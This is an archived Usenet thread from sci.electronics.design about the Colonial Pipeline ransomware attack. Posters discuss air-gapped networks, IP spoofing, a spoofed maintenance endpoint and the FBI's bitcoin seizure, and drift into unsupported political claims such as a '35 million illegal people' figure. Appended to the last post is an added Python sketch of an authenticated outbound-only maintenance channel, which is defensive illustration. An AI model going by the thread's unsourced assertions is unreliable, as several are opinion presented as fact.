albert@spe&ar&c.xs4all.nl &=n http://home.hccnet.nl/a.w.m.van.der.horst

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<79a376df-22f0-4c8e-96c6-4f3581e0d456n@googlegroups.com>


https://www.novabbs.com/tech/article-flat.php?id=63424&group=sci.electronics.design#63424

X-Received: by 2002:ae9:f113:: with SMTP id k19mr2310751qkg.483.1621339829965; Tue, 18 May 2021 05:10:29 -0700 (PDT)
X-Received: by 2002:a37:a6c6:: with SMTP id p189mr5134293qke.161.1621339829752; Tue, 18 May 2021 05:10:29 -0700 (PDT)
Path: i2pn2.org!i2pn.org!aioe.org!feeder1.feed.usenet.farm!feed.usenet.farm!tr3.eu1.usenetexpress.com!feeder.usenetexpress.com!tr2.iad1.usenetexpress.com!border1.nntp.dca1.giganews.com!nntp.giganews.com!news-out.google.com!nntp.google.com!postnews.google.com!google-groups.googlegroups.com!not-for-mail
Newsgroups: sci.electronics.design
Date: Tue, 18 May 2021 05:10:29 -0700 (PDT)
In-Reply-To: <013c6a99-3dab-4650-8945-8485943a2283n@googlegroups.com>
Injection-Info: google-groups.googlegroups.com; posting-host=65.207.89.54; posting-account=I-_H_woAAAA9zzro6crtEpUAyIvzd19b
NNTP-Posting-Host: 65.207.89.54
References: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com> <7dfae847-1440-497a-abe3-5a42b5ae3a19n@googlegroups.com> <553f9b17-6a07-4500-a6fe-a08373099606n@googlegroups.com> <16f6ae28-f9dd-4330-b122-88cf5cb169aan@googlegroups.com> <50d677b8-5221-44b7-8019-0f94d61e3e19n@googlegroups.com> <dc33d98b-81b8-4abb-9d37-126ad8c93c04n@googlegroups.com> <s7uh09$1q7$1@dont-email.me> <61d05632-91bc-435f-8389-2b2d3aea7818n@googlegroups.com> <s7uhqb$8ah$1@dont-email.me> <df66e72e-7295-427d-8a5f-3e9bdd7e9653n@googlegroups.com> <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com> <s7upvk$2bp$1@dont-email.me> <013c6a99-3dab-4650-8945-8485943a2283n@googlegroups.com>
User-Agent: G2/1.0
MIME-Version: 1.0
Message-ID: <79a376df-22f0-4c8e-96c6-4f3581e0d456n@googlegroups.com>
Subject: Re: Tech audit of Colonial Pipeline found ‘glaring’ problems
From: gnuarm.d...@gmail.com (Rick C)
Injection-Date: Tue, 18 May 2021 12:10:29 +0000
Content-Type: text/plain; charset="UTF-8"
Lines: 49
 by: Rick C - Tue, 18 May 2021 12:10 UTC

On Monday, May 17, 2021 at 7:16:00 PM UTC-4, Ed Lee wrote:
> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> > On 5/17/2021 2:12 PM, Ed Lee wrote:
> >
> > > As long as proxies and/or original attack servers are in the US, they can
> > > send the FBI there. If they are from Russia, perhaps Putin would send the
> > > KGB there to help them.
> > The damage is still done. Are you going to arrest Mary Smith
> > because HER computer was used to shut down the centrifuges that
> > were processing the Uranium? You might hassle her and leave
> > her thinking that she should never open an email attachment
> > (or visit the "housewives for democracy" website). But,
> > you're still left with a crippled bit of infrastructure
> > and a "connection" that goes off to the next guy down the chain.
> They can confiscate Mary's PC and start tracking down the next guy Tom.
> > >> The silly part is guessing as to what was wrong and then speculating on
> > >> how to fix it.
> > >
> > > The wrong thing was having foreign access to mission critical computers.
> > The wrong thing was not having SECURE *remote* access (assuming remote
> > access was necessary).
> >
> > You can spoof a MAC or IP address; it's not rocket science. You
> > can't KNOW where the connection is coming from.
> You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.
> > You can limit maintenance activities to OUTBOUND connections
> > (i.e., have the kit contact a "known" computer). But, would
> > have to hardwire an IP address to avoid DNS cache poisoning
> > effects. And, a dedicated hacker could still locate a device
> > "somewhere" that convinces the routers involved that *it*
> > is the legitimate hardwired IP address.
> >
> > (you *did* note the pwn plug reference I made, earlier?
> > Imagine *it* was sitting on John, Head of Pipeline Operations'
> > computer. *It* would appear to be the legitimate target of any
> > maintenance transactions if it filtered traffic to John's
> > *real* PC)
> Port scanning, intrusion and proxy take days. The authority would have time to shutdown John's PC, if it's in the US.
> > Security is hard. Just thinking you can slap some bandaid
> > or "guard" on a system is blissful ignorance.
> That doesn't mean we just let it wide open, without blocking anything.

The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!

--

Rick C.

+-+ Get 1,000 miles of free Supercharging
+-+ Tesla referral code - https://ts.la/richard11209

Re: Tech audit of Colonial Pipeline found ?glaring? problems

<MPG.3b0d92a76160a9929897b1@news.eternal-september.org>


https://www.novabbs.com/tech/article-flat.php?id=63425&group=sci.electronics.design#63425

Path: i2pn2.org!i2pn.org!eternal-september.org!reader02.eternal-september.org!.POSTED!not-for-mail
From: rmower...@charter.net (Ralph Mowery)
Newsgroups: sci.electronics.design
Subject: Re: Tech audit of Colonial Pipeline found ?glaring? problems
Date: Tue, 18 May 2021 10:01:10 -0400
Organization: A noiseless patient Spider
Lines: 12
Message-ID: <MPG.3b0d92a76160a9929897b1@news.eternal-september.org>
References: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com> <7dfae847-1440-497a-abe3-5a42b5ae3a19n@googlegroups.com> <553f9b17-6a07-4500-a6fe-a08373099606n@googlegroups.com> <16f6ae28-f9dd-4330-b122-88cf5cb169aan@googlegroups.com> <50d677b8-5221-44b7-8019-0f94d61e3e19n@googlegroups.com> <dc33d98b-81b8-4abb-9d37-126ad8c93c04n@googlegroups.com> <s7uh09$1q7$1@dont-email.me> <61d05632-91bc-435f-8389-2b2d3aea7818n@googlegroups.com> <s7uhqb$8ah$1@dont-email.me> <df66e72e-7295-427d-8a5f-3e9bdd7e9653n@googlegroups.com> <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com> <s7upvk$2bp$1@dont-email.me> <013c6a99-3dab-4650-8945-8485943a2283n@googlegroups.com> <79a376df-22f0-4c8e-96c6-4f3581e0d456n@googlegroups.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-15"
Content-Transfer-Encoding: 7bit
Injection-Info: reader02.eternal-september.org; posting-host="c155a0841d246114ea624214658aa211";
logging-data="11363"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX19EXgvy5Wx0qCV1TDVuYNPQFS8u/ZoCjYU="
User-Agent: MicroPlanet-Gravity/3.0.4
Cancel-Lock: sha1:PNLSZAWbsbR95ZoPgCBLrOOUI5g=
 by: Ralph Mowery - Tue, 18 May 2021 14:01 UTC

In article <79a376df-22f0-4c8e-96c6-4f3581e0d456n@googlegroups.com>,
gnuarm.deletethisbit@gmail.com says...
>
> The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!
>
>
>

Reports are there are over 35 million illegal people in the US. They do
not seem to be able to track or do anything with them but feed and house
them when found.

Re: Tech audit of Colonial Pipeline found ?glaring? problems

<fd71425f-6136-4b98-a2c7-b00f8161b2f2n@googlegroups.com>


https://www.novabbs.com/tech/article-flat.php?id=63426&group=sci.electronics.design#63426

X-Received: by 2002:ac8:514f:: with SMTP id h15mr5080571qtn.122.1621348855830;
Tue, 18 May 2021 07:40:55 -0700 (PDT)
X-Received: by 2002:a05:6214:2625:: with SMTP id gv5mr5966975qvb.14.1621348855603;
Tue, 18 May 2021 07:40:55 -0700 (PDT)
Path: i2pn2.org!i2pn.org!weretis.net!feeder8.news.weretis.net!proxad.net!feeder1-2.proxad.net!209.85.160.216.MISMATCH!news-out.google.com!nntp.google.com!postnews.google.com!google-groups.googlegroups.com!not-for-mail
Newsgroups: sci.electronics.design
Date: Tue, 18 May 2021 07:40:55 -0700 (PDT)
In-Reply-To: <MPG.3b0d92a76160a9929897b1@news.eternal-september.org>
Injection-Info: google-groups.googlegroups.com; posting-host=65.207.89.54; posting-account=I-_H_woAAAA9zzro6crtEpUAyIvzd19b
NNTP-Posting-Host: 65.207.89.54
References: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com>
<7dfae847-1440-497a-abe3-5a42b5ae3a19n@googlegroups.com> <553f9b17-6a07-4500-a6fe-a08373099606n@googlegroups.com>
<16f6ae28-f9dd-4330-b122-88cf5cb169aan@googlegroups.com> <50d677b8-5221-44b7-8019-0f94d61e3e19n@googlegroups.com>
<dc33d98b-81b8-4abb-9d37-126ad8c93c04n@googlegroups.com> <s7uh09$1q7$1@dont-email.me>
<61d05632-91bc-435f-8389-2b2d3aea7818n@googlegroups.com> <s7uhqb$8ah$1@dont-email.me>
<df66e72e-7295-427d-8a5f-3e9bdd7e9653n@googlegroups.com> <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>
<s7upvk$2bp$1@dont-email.me> <013c6a99-3dab-4650-8945-8485943a2283n@googlegroups.com>
<79a376df-22f0-4c8e-96c6-4f3581e0d456n@googlegroups.com> <MPG.3b0d92a76160a9929897b1@news.eternal-september.org>
User-Agent: G2/1.0
MIME-Version: 1.0
Message-ID: <fd71425f-6136-4b98-a2c7-b00f8161b2f2n@googlegroups.com>
Subject: Re: Tech audit of Colonial Pipeline found ?glaring? problems
From: gnuarm.d...@gmail.com (Rick C)
Injection-Date: Tue, 18 May 2021 14:40:55 +0000
Content-Type: text/plain; charset="UTF-8"
 by: Rick C - Tue, 18 May 2021 14:40 UTC

On Tuesday, May 18, 2021 at 10:01:17 AM UTC-4, Ralph Mowery wrote:
> In article <79a376df-22f0-4c8e...@googlegroups.com>,
> gnuarm.del...@gmail.com says...
> >
> > The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!
> >
> >
> >
> Reports are there are over 35 million illegal people in the US. They do
> not seem to be able to track or do anything with them but feed and house
> them when found.

What does that have to do with anything???

--

Rick C.

++- Get 1,000 miles of free Supercharging
++- Tesla referral code - https://ts.la/richard11209

Re: Tech audit of Colonial Pipeline found ?glaring? problems

<33b15203-955e-fc8f-6fe7-9470bb398017@electrooptical.net>


https://www.novabbs.com/tech/article-flat.php?id=63427&group=sci.electronics.design#63427

Path: i2pn2.org!i2pn.org!eternal-september.org!reader02.eternal-september.org!.POSTED!not-for-mail
From: pcdhSpam...@electrooptical.net (Phil Hobbs)
Newsgroups: sci.electronics.design
Subject: Re: Tech audit of Colonial Pipeline found ?glaring? problems
Date: Tue, 18 May 2021 11:09:41 -0400
Organization: A noiseless patient Spider
Lines: 39
Message-ID: <33b15203-955e-fc8f-6fe7-9470bb398017@electrooptical.net>
References: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com>
<df66e72e-7295-427d-8a5f-3e9bdd7e9653n@googlegroups.com>
<86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>
<MPG.3b0cb399adffcb3d9897af@news.eternal-september.org>
<60a37c28$0$29342$e4fe514c@news.xs4all.nl>
Mime-Version: 1.0
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Injection-Info: reader02.eternal-september.org; posting-host="5badd9e4568e93a29e9b6c09ce088fe2";
logging-data="11534"; mail-complaints-to="abuse@eternal-september.org"; posting-account="U2FsdGVkX18xTu/FAO1c1+g461ppIoBh"
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Cancel-Lock: sha1:DiuDkIoaibySEe9l1Y9JdHXvqHA=
In-Reply-To: <60a37c28$0$29342$e4fe514c@news.xs4all.nl>
 by: Phil Hobbs - Tue, 18 May 2021 15:09 UTC

albert wrote:
> In article <MPG.3b0cb399adffcb3d9897af@news.eternal-september.org>,
> Ralph Mowery <rmowery42@charter.net> wrote:
>> In article <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
>> edward.ming.lee@gmail.com says...
>>>
>>>> The silly part is guessing as to what was wrong and then speculating on how to fix it.
>>>
>>> The wrong thing was having foreign access to mission critical computers.
>>>
>>>
>>
>> The real wrong thing is to put anything on the internet where it can be
>> accessed. While even a hard wired setup can be hacked, it would be much
>> more difficult.
>
> I worked with the Netherlands tax office. They had a country wide net
> totally separate from the Internet. If I wanted to google something, I
> had to go to the internet computer in a different room. Of course most
> plants have not even a need for a country wide net.

I sort of doubt that they ran all their own wires, though, so it must
have been either on the phone or cable network, or else tunnelled over IP.

Cheers

Phil Hobbs

--
Dr Philip C D Hobbs
Principal Consultant
ElectroOptical Innovations LLC / Hobbs ElectroOptics
Optics, Electro-optics, Photonics, Analog Electronics
Briarcliff Manor NY 10510

http://electrooptical.net
http://hobbs-eo.com

Re: Tech audit of Colonial Pipeline found ?glaring? problems

<81e17217-1efc-4773-a019-77fac29fe550n@googlegroups.com>


https://www.novabbs.com/tech/article-flat.php?id=63428&group=sci.electronics.design#63428

X-Received: by 2002:a37:6084:: with SMTP id u126mr5324439qkb.294.1621351630377;
Tue, 18 May 2021 08:27:10 -0700 (PDT)
X-Received: by 2002:ae9:c112:: with SMTP id z18mr6104046qki.100.1621351630201;
Tue, 18 May 2021 08:27:10 -0700 (PDT)
Path: i2pn2.org!i2pn.org!weretis.net!feeder8.news.weretis.net!proxad.net!feeder1-2.proxad.net!209.85.160.216.MISMATCH!news-out.google.com!nntp.google.com!postnews.google.com!google-groups.googlegroups.com!not-for-mail
Newsgroups: sci.electronics.design
Date: Tue, 18 May 2021 08:27:09 -0700 (PDT)
In-Reply-To: <33b15203-955e-fc8f-6fe7-9470bb398017@electrooptical.net>
Injection-Info: google-groups.googlegroups.com; posting-host=65.207.89.54; posting-account=I-_H_woAAAA9zzro6crtEpUAyIvzd19b
NNTP-Posting-Host: 65.207.89.54
References: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com>
<df66e72e-7295-427d-8a5f-3e9bdd7e9653n@googlegroups.com> <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>
<MPG.3b0cb399adffcb3d9897af@news.eternal-september.org> <60a37c28$0$29342$e4fe514c@news.xs4all.nl>
<33b15203-955e-fc8f-6fe7-9470bb398017@electrooptical.net>
User-Agent: G2/1.0
MIME-Version: 1.0
Message-ID: <81e17217-1efc-4773-a019-77fac29fe550n@googlegroups.com>
Subject: Re: Tech audit of Colonial Pipeline found ?glaring? problems
From: gnuarm.d...@gmail.com (Rick C)
Injection-Date: Tue, 18 May 2021 15:27:10 +0000
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
 by: Rick C - Tue, 18 May 2021 15:27 UTC

On Tuesday, May 18, 2021 at 11:09:48 AM UTC-4, Phil Hobbs wrote:
> albert wrote:
> > In article <MPG.3b0cb399a...@news.eternal-september.org>,
> > Ralph Mowery <rmow...@charter.net> wrote:
> >> In article <86e93215-4a42-459c...@googlegroups.com>,
> >> edward....@gmail.com says...
> >>>
> >>>> The silly part is guessing as to what was wrong and then speculating on how to fix it.
> >>>
> >>> The wrong thing was having foreign access to mission critical computers.
> >>>
> >>>
> >>
> >> The real wrong thing is to put anything on the internet where it can be
> >> accessed. While even a hard wired setup can be hacked, it would be much
> >> more difficult.
> >
> > I worked with the Netherlands tax office. They had a country wide net
> > totally separate from the Internet. If I wanted to google something, I
> > had to go to the internet computer in a different room. Of course most
> > plants have not even a need for a country wide net.
> I sort of doubt that they ran all their own wires, though, so it must
> have been either on the phone or cable network, or else tunnelled over IP.

Voice and data connections have never needed to be on any network as such. Locally the phone company has supplied direct connections between buildings using their wires without going through switching equipment and so not on their "network". Private companies have long used their own microwave links for longer distance communications. These sorts of communications have been used for many decades longer than the Internet has been available. Heck, one company I worked for considered using a microwave link to connect buildings across the street to save on the phone bill.

Even today many power companies have extensive communications using microwave and fiber. Many believe they should use that capability to provide Internet access to rural areas, but the power companies don't want to risk the exposure.

--

Rick C.

+++ Get 1,000 miles of free Supercharging
+++ Tesla referral code - https://ts.la/richard11209

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<s8118c$9ea$1@dont-email.me>

https://www.novabbs.com/tech/article-flat.php?id=63430&group=sci.electronics.design#63430

 by: Don Y - Tue, 18 May 2021 18:32 UTC

On 5/18/2021 7:01 AM, Ralph Mowery wrote:

> Reports are there are over 35 million illegal people in the US. The do
> not seem to be able to track or do anything with them but feed and house
> them when found.

Sort of like the 3 million ILLEGAL votes allegedly cast in the 2016
election -- and, despite appointing a special commission to track them
down, none seem to have turned up! (and the *7* million that have
been cast in 2020?)

I guess counting seems to be a problem -- especially if you have an 'R'
after your name -- as folks always have to make claims about numbers
without ever managing to back them up. Perhaps once both hands and
feet are in use, the numbers are just too hard to deal with?

One wonders what NEW recount they'll undertake in Arizona after
the latest (third? fourth?) fails to yield all of the "missing
and illegal" votes they ALLEGE? (after hiring a firm that
has no experience doing such... sorta like hiring a plumber
to do brain surgery! Yup, sound reasoning, that!)

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<OeudnXx3QI6fjDn9nZ2dnUU7-YmdnZ2d@giganews.com>

https://www.novabbs.com/tech/article-flat.php?id=63431&group=sci.electronics.design#63431

 by: John Robertson - Tue, 18 May 2021 19:09 UTC

On 2021/05/18 11:32 a.m., Don Y wrote:
> On 5/18/2021 7:01 AM, Ralph Mowery wrote:
>
>> Reports are there are over 35 million illegal people in the US. The do
>> not seem to be able to track or do anything with them but feed and house
>> them when found.
>
> Sort of like the 3 million ILLEGAL votes allegedly cast in the 2016
> election -- and, despite appointing a special commission to track them
> down, none seem to have turned up!  (and the *7* million that have
> been cast in 2020?)

I suspect they are considered illegal because the votes were against
their candidate.

Such lies breed fascism...not surprisingly.

John :-#(#

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<s81562$6pl$1@dont-email.me>

https://www.novabbs.com/tech/article-flat.php?id=63433&group=sci.electronics.design#63433

 by: Don Y - Tue, 18 May 2021 19:39 UTC

On 5/18/2021 12:09 PM, John Robertson wrote:
>
> On 2021/05/18 11:32 a.m., Don Y wrote:
>> On 5/18/2021 7:01 AM, Ralph Mowery wrote:
>>
>>> Reports are there are over 35 million illegal people in the US. The do
>>> not seem to be able to track or do anything with them but feed and house
>>> them when found.
>>
>> Sort of like the 3 million ILLEGAL votes allegedly cast in the 2016
>> election -- and, despite appointing a special commission to track them
>> down, none seem to have turned up! (and the *7* million that have
>> been cast in 2020?)
>
> I suspect they are considered illegal because the votes were against their
> candidate.

There may well have been illegal votes cast! But, if you allege
THREE MILLION, you'd think they'd at least be able to find THREE THOUSAND?

> Such lies breed fascism...not surprisingly.

When you have folks who refuse to believe *facts* -- or, who value their
own *self* (interests) above their fellow men -- then you have even
more serious potential problems.

"Everyone who believes in GRAVITY, please move to the FRONT of the room.
Those folks who don't, please move to the CEILING..."

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<a3a3e757-cb20-4a66-999f-136de251a5f5n@googlegroups.com>

https://www.novabbs.com/tech/article-flat.php?id=63443&group=sci.electronics.design#63443

 by: Dean Hoffman - Wed, 19 May 2021 01:46 UTC

On Friday, May 14, 2021 at 10:05:29 AM UTC-5, Fred Bloggs wrote:
> Probably something to do with Russian porn sites and Baptists:
>
> https://apnews.com/article/va-state-wire-technology-business-1f06c091c492c1630471d29a9cf6529d
>
> Another American farce operation...

Some more problems.
<https://www.dailymail.co.uk/news/article-9592699/Colonial-Pipelines-network-goes-South-suffers-fuel-shortages.html>

Ten thousand stations still didn't have fuel as of Tuesday according to the article.

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<s81qob$49h$3@dont-email.me>

https://www.novabbs.com/tech/article-flat.php?id=63445&group=sci.electronics.design#63445

 by: John Doe - Wed, 19 May 2021 01:47 UTC

Google groups troll...

--
Fred Bloggs <bloggs.fredbloggs.fred@gmail.com> wrote:

>
> Probably something to do with Russian porn sites and Baptists:
>
> https://apnews.com/article/va-state-wire-technology-business-1f06c091c492c1630471d29a9cf6529d
>
> Another American farce operation...
>
>

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<s84fkk$qdg$1@gioia.aioe.org>

https://www.novabbs.com/tech/article-flat.php?id=63558&group=sci.electronics.design#63558

 by: Decadent...@decadence.org - Thu, 20 May 2021 01:56 UTC

Ralph Mowery <rmowery42@charter.net> wrote in
news:MPG.3b0cb399adffcb3d9897af@news.eternal-september.org:

> In article
> <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
> edward.ming.lee@gmail.com says...
>>
>> > The silly part is guessing as to what was wrong and then
>> > speculating on how to fix it.
>>
>> The wrong thing was having foreign access to mission critical
>> computers.
>>
>>
>
> The real wrong thing is to put anything on the internet where it
> can be accessed. While even a hard wired setup can be hacked, it
> would be much more difficult.
>
>

Is it not Windows based computers we are talking about?

How many Linux run systems are being hacked?

Re: Tech audit of Colonial Pipeline found ‘glaring’ problems

<e49d430f-d615-4f23-a026-3b9a78291285n@googlegroups.com>

https://www.novabbs.com/tech/article-flat.php?id=64875&group=sci.electronics.design#64875

 by: Ed Lee - Wed, 9 Jun 2021 01:06 UTC

On Tuesday, May 18, 2021 at 5:10:33 AM UTC-7, gnuarm.del...@gmail.com wrote:
> On Monday, May 17, 2021 at 7:16:00 PM UTC-4, Ed Lee wrote:
> > On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> > > On 5/17/2021 2:12 PM, Ed Lee wrote:
> > >
> > > > As long as proxies and/or original attack servers are in the US, they can
> > > > send the FBI there. If they are from Russia, perhaps Putin would send the
> > > > KGB there to help them.
> > > The damage is still done. Are you going to arrest Mary Smith
> > > because HER computer was used to shut down the centrifuges that
> > > were processing the Uranium? You might hassle her and leave
> > > her thinking that she should never open an email attachment
> > > (or visit the "housewives for democracy" website). But,
> > > you're still left with a crippled bit of infrastructure
> > > and a "connection" that goes off to the next guy down the chain.
> > They can confiscate Mary's PC and start tracking down the next guy Tom.
> > > >> The silly part is guessing as to what was wrong and then speculating on
> > > >> how to fix it.
> > > >
> > > > The wrong thing was having foreign access to mission critical computers.
> > > The wrong thing was not having SECURE *remote* access (assuming remote
> > > access was necessary).
> > >
> > > You can spoof a MAC or IP address; it's not rocket science. You
> > > can't KNOW where the connection is coming from.
> > You have to spoof an IP address within range of your ISP. If it's a local ISP, it can be traced.
> > > You can limit maintenance activities to OUTBOUND connections
> > > (i.e., have the kit contact a "known" computer). But, would
> > > have to hardwire an IP address to avoid DNS cache poisoning
> > > effects. And, a dedicated hacker could still locate a device
> > > "somewhere" that convinces the routers involved that *it*
> > > is the legitimate hardwired IP address.
> > >
> > > (you *did* note the pwn plug reference I made, earlier?
> > > Imagine *it* was sitting on John, Head of Pipeline Operations'
> > > computer. *It* would appear to be the legitimate target of any
> > > maintenance transactions if it filtered traffic to John's
> > > *real* PC)
> > Port scanning, intrusion and proxy take days. The authority would have time to shutdown John's PC, if it's in the US.
> > > Security is hard. Just thinking you can slap some bandaid
> > > or "guard" on a system is blissful ignorance.
> > That doesn't mean we just let it wide open, without blocking anything.
> The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!

Well, that's what the FBI did. Track and trace the IP submitting the wallet address for the bitcoin. Seize the computer (server) and recover the private key. Steal all the coins in that wallet. They got lucky this time. The hackers were stupid enough to put the wallet on a server within FBI authority.
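The maintenance-channel argument quoted in this post (dial out only, hardwire the server's address, and accept that a device which captures that address still answers the call) as an added example in Python, not code from the thread or from any pipeline operator. The address, the pre-shared key and the class names are constructed for the example, and the transport is simulated in-process rather than over sockets; the point it adds is that address is not identity, so the far end must prove possession of a key against a fresh nonce.

```python
"""Outbound-only maintenance channel with an authenticated far end.

Added example, not code from the thread. The kit only dials OUT to a hardwired
address (no DNS to poison); since an attacker who captures that address still
answers the call, the far end must also prove possession of a pre-shared key
against a fresh nonce. Address, key and names are constructed; transport is
simulated in-process."""
import hashlib
import hmac
import secrets

MAINT_SERVER_IP = "203.0.113.10"   # constructed (TEST-NET-3), hardwired in the kit
PSK = b"constructed-example-psk"   # assumption: provisioned out of band, never sent

def _tag(key: bytes, role: bytes, kit_nonce: bytes, server_nonce: bytes) -> bytes:
    """HMAC over both nonces plus a role label, so a server tag cannot be replayed as a kit tag."""
    return hmac.new(key, role + kit_nonce + server_nonce, hashlib.sha256).digest()

class MaintenanceServer:
    """Legitimate far end: holds the key, so it can answer any fresh challenge."""
    def __init__(self, key: bytes) -> None:
        self.key = key

    def respond(self, kit_nonce: bytes) -> tuple[bytes, bytes]:
        server_nonce = secrets.token_bytes(16)
        return server_nonce, _tag(self.key, b"server", kit_nonce, server_nonce)

    def verify_kit(self, kit_nonce: bytes, server_nonce: bytes, kit_tag: bytes) -> bool:
        return hmac.compare_digest(kit_tag, _tag(self.key, b"kit", kit_nonce, server_nonce))

class Impostor:
    """Device that has taken over the hardwired IP (the 'pwn plug' case) but has no
    key. The best it can do is replay a response sniffed from an earlier session."""
    def __init__(self, sniffed: tuple[bytes, bytes]) -> None:
        self.sniffed = sniffed

    def respond(self, kit_nonce: bytes) -> tuple[bytes, bytes]:
        return self.sniffed

class Kit:
    """Field device: refuses inbound sessions and any destination other than the
    hardwired IP, then runs challenge/response before accepting maintenance."""
    def __init__(self, key: bytes, server_ip: str) -> None:
        self.key = key
        self.server_ip = server_ip

    def allowed(self, direction: str, dest_ip: str) -> bool:
        return direction == "outbound" and dest_ip == self.server_ip

    def authenticate(self, peer) -> bool:
        kit_nonce = secrets.token_bytes(16)            # fresh per session: defeats replay
        server_nonce, server_tag = peer.respond(kit_nonce)
        expected = _tag(self.key, b"server", kit_nonce, server_nonce)
        if not hmac.compare_digest(server_tag, expected):
            return False                               # right address, wrong key: refuse
        kit_tag = _tag(self.key, b"kit", kit_nonce, server_nonce)
        return peer.verify_kit(kit_nonce, server_nonce, kit_tag)   # mutual: kit proves itself too

def run_scenarios() -> dict[str, bool]:
    """Each entry is True when the channel behaved as the argument requires."""
    kit = Kit(PSK, MAINT_SERVER_IP)
    server = MaintenanceServer(PSK)
    sniffed = server.respond(secrets.token_bytes(16))  # an earlier session seen on the wire
    impostor = Impostor(sniffed)
    return {
        "inbound_refused": not kit.allowed("inbound", MAINT_SERVER_IP),
        "other_ip_refused": not kit.allowed("outbound", "198.51.100.7"),
        "legit_server_accepted": kit.allowed("outbound", MAINT_SERVER_IP)
        and kit.authenticate(server),
        "impostor_at_right_ip_refused": kit.allowed("outbound", MAINT_SERVER_IP)
        and not kit.authenticate(impostor),
    }

if __name__ == "__main__":
    for name, ok in run_scenarios().items():
        print(f"{name}: {'PASS' if ok else 'FAIL'}")
```

In a real deployment the pre-shared key would be replaced by per-device credentials and the simulated exchange would run inside TLS with a pinned server key, but the structure of the check is the same.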
